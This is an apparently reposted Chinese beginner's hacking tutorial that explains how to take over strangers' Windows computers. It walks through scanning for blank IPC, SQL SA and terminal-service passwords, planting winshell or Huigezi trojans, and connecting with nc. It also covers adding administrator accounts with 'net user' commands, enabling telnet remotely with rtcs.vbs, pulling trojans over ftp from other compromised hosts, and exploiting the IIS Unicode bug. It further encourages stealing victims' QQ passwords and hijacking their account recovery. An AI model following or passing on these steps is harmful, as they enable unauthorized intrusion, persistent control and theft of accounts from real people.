菜鸟常用详细教程

《菜鸟常用详细教程》由会员分享，可在线阅读，更多相关《菜鸟常用详细教程（4页珍藏版）》请在金锄头文库上搜索。

1、菜鸟常用详细教程菜鸟常用详细教程看到论坛里有部分会员问的都是一些怎样入侵对方电脑的问题。想了许久，我决定自己提笔写一篇文章，总结我几个月来接触这个领域的一点经验，希望能对跟我一样菜的菜鸟们点帮助。这也是我第一次写文章，有些地方难免会出现错误，如有不明地方可以提出来。好！废话就不多说了，开始步入正题吧！开始之前先请各位统装 98 的改装 NT 以上系统，因为下面用到的一些命令和软件 在 98 下是行不通的。通常得到管理员权限才能说入侵控制了对方计算机，所以下面的入侵方法都能得到管理员权限。说句题外话，我用的是 win2000，所以操作都是在这个系统通过的。 1. 不用说，肯定是 IPC 弱口令啦

2、，真不明白网上为什么会有那么多这种人见人爱车见车载的计算机，随便一扫都能扫出一大堆。首先，打开流光 4.7，记得要打 IP 补丁啊，不然不能扫国内的主机，这样是很不爽的，要来个通杀嘛，呵呵。点击“探测-高级扫描工具” ，出现一个方框，输入一段 IP，检测项目中只需在 IPC 前面打钩。点“确定开始”就开始探测了。如果你的 IP 段够好的话，很快就可以在最下面的方框里看到结果。哈哈真是多啊，基本上都是空口令。好，现在就开始入侵了，点击“工具NT/IIS 工具种植者”，填入刚才扫描得到的结果，选一个应用程序文件，我常用的是独孤剑客的 winshell(下面提到的都是默认设置） ，5K 大小，是我

3、56K猫的最爱！你也可以上传灰鸽子，这种木马挺不错的，能自动解析域名上线，还可以避过防火墙。一分钟后，我传上去的 winshell运行了，很自然的打开 cmd.exe，打上 nc IP 5277 提示输入密码，输入设置 winshell 时的密码(默认为空） ，回车就进入对方电脑了。这时出现 cmd提示符，输入 i(安装 winshell)再输入 s(进入 cmd)，再再输入“net start winshell” （后台服务，开机自动运行） 。完成前面的步骤后，才算是真正进去了。进去干嘛呢？嗯这确实是个很高深的问题￥想干什么就给你们去想吧。不过，呵呵，我还是想说几句，推荐找到他的 tence

4、nt 目录，找到他的 QQ 号码，加他为好友，方便以后长期控制他（肉机啊） 。如果他不肯通过你的请求，那就用狠一点的手段，利用流光种植者再上传一个 QQ 杀手，把他的 QQ 密码偷到手。得到他的密码之后就就用他的QQ 登陆，再用自己的私人 QQ 提交好友请求。爽吧加多一句废话，如果他还没申请密码保护，那就好心点，帮他申请啦，不过邮箱记得要用自己的啊！ 2. 3389。请各位注意，我这里并不是说什么烂鬼输入法漏洞。这种漏洞差不多已经绝迹了，太难找了，如果有人找到了，那恭喜你啦，证明你今天时运高，记得要买彩票啊！众所周知，有开 3389 的一般都是服务器，也就是说有很大可能带局域网的，而内部入侵比

5、外部要方便一点。如何能快速方便的得到开了终端的肉机呢？这需要用到两个工具，都是扫描工具来的，scanner3.0 和焦点的 xscan。打开 scanner，输入一段 IP，范围要大一点，scanner 速度很快的。在“所有端口从”那里都填 3389，点击“开始”就可以开工了。跟QQ 上的好友聊了几句之后，铛扫描完成，结果出来了。点击右下脚的“删除”把多余的 IP 删了，只留下开了 3389 的 IP。再点击“保存” ，把结果保存到文件夹里。找到保存文件的目录，打开它。用记事本的替换功能把它保存为一个纯 IP 的 TXT 文件。 “编辑替换”在“查找内容”里输入要删除的垃圾，再点“全部替换”就

6、行了。打开 xscan，点击左边的蓝色按钮，进入“扫描板块” ，只需在“SQL-Server 弱口令” “NT-Server 弱口令”前打钩，其他都清除掉。再点击右边的蓝色按钮，进入“扫描参数” ，钩上“从文件获取主机列表” ，打开刚才替换成纯 IP 的 TXT 文件，确定之后就可以扫描了。这时需要比较长的时间！去论坛灌灌水，跟 MM 说几句话吧，不要傻等就行了。确定目标，用 mstsc（登陆终端的工具）登陆对方主机后，打开对方 cmd.exe，输入“net use” ，先看看有没有人也在连接这部机（安全一点好，_） 。 “net view”命令之后当出现一堆前面带字符的就表示就表示什么呢？我

7、想大家都非常明白吧! 这时你就可以在那部计算机里下载并装个像“网络执行官”之类的局域网控制软件。碰到这样的计算机一定要珍惜啊，要充分利用利用。 3.sa 空口令。这时又要用到流光了，点击“探测-扫描POP3/FTP/NT/SQL 主机” ，扫描主机类型设为 SQL，把“将FrontPage 主机自动加入 HTTP 列表”去掉。扫描结果出来了之后，用鼠标左键单击某一个结果，点两下“连接”就会出现一个方框，“Type Command at Prompt”提示符是 SQLCMD。打入一个命令“net user 要创建的用户名 密码 /add” （这是创建一个用户） ，再打一个“net localgr

8、oup administrators 刚创建的用户名 /add”（把创建的用户加到 administrators 组） 。创建了用户当然是用流光种植者上传后门啦，填入资料，点确定，但却提示上传文件失败，再检查一下 IP,用户名，密码，并没有错啊。咚咚告诉你们吧，这是因为对方删除了 IPC$，种植者需要 IPC 连接，你当然上传不了文件啦。这时候就要动用另一种工具，它的特点是：不依赖于目标的 ipc$开放与否远程开启/关闭目标 telnet 服务，这就是“rtcs.vbs” 。在 cmd 输入：“cscript RTCS.vbs 目标 IP 用户名 密码 NTLM 验证方式 telnet 服务端

9、口” ，当出现“to get a shelll”时就表示成功了，你就可以“telnet IP 服务端口”了，简单吧！如果你想上传木马，也很简单，只要登陆 ftp 服务器（要有你要下载的木马服务端） 。这些可以找网上的肉机，弱密码的实在太多了，或用自己部机做服务器也可以，后面我会详细介绍。telnet 上对方，输入“ftp ftp 服务器 IP”用户名密码进入， “get 木马服务端”就下载来了。 “bye”退出 ftp，输入木马文件名回车就运行了，以后你就可以用木马控制他了。 4.U 漏洞。这种漏洞现在虽然很少，但还是可以比较轻松的扫描到，用这种方法黑网站确实很轻松。但我们这次说的并不是如何黑

10、网站，而是如何取得管理员权限。首先，启动流光，选择“探测-扫描POP3/FTP/NT/SQL 主机” ， “扫描主机类型”为 NT/98。等一段时间（看你扫描 IP 多少来看）扫描完成后。如果你能在中间的方框里看到黑色的小电脑，就说明你已经得到了存在 U 漏洞的主机了。双击iiscrk（小金的作品） ，在“当前连接”处添上刚才扫描得到的主机，其他设置一般默认行了，不行，换其他方式试试。点击左边第一个图标连接 IIS 主机，如果成功，你就会在最下边的方框看到对方主机目录。要当心啊，具有删读的权限，不要乱破坏（警告） 。好，现在开始真正工作了。单击左数第六个图标“tftp” ，如何做我就不多说了，

11、里面说得明明白白。不过，要上传什么文件我还是要说的，这个就是 iiscrk 自带的 idq.dll，把它上传到 cripts 目录，成功后。在 cmd 输入“ispc 对方 IP/scripts/idq.dll ” （ISPC 每次执行一个命令要打 3 次回车） 。成功登陆到对方后，你就有了 system权限。用我上面提到的方法创建用户并加他到 administrators 组。我要补充的是，一般你连接上去时出现的目录都是可执行目录，文件可放在里面。 本来我打算写多几种方法的，但没有什么时间，现在我连打开电脑的时间都受到了限制（痛苦 ing)。因为这次期中考考得实在是￥！唉，有一科还是老师好心，送我几分我才及格（太惭愧了） 。看来要以后啦。 。 上面提到的软件如果本站没有下载， 搜索。 推荐几个不错的东东，适合菜鸟（我也经常用）： DameWare Mini Remote Control（远程桌面控制） Loader（我主要是用它来改 QQ 端口，因为我经常用代理啊） BlackICE PC Protection（防火墙） MsgSend（发信息用) QQ 代理（不用我说，你们肯定知道是干嘛的） ttyip（隐藏自己在论坛、留言本、计数器、WEB 聊天室、网页的真实 IP)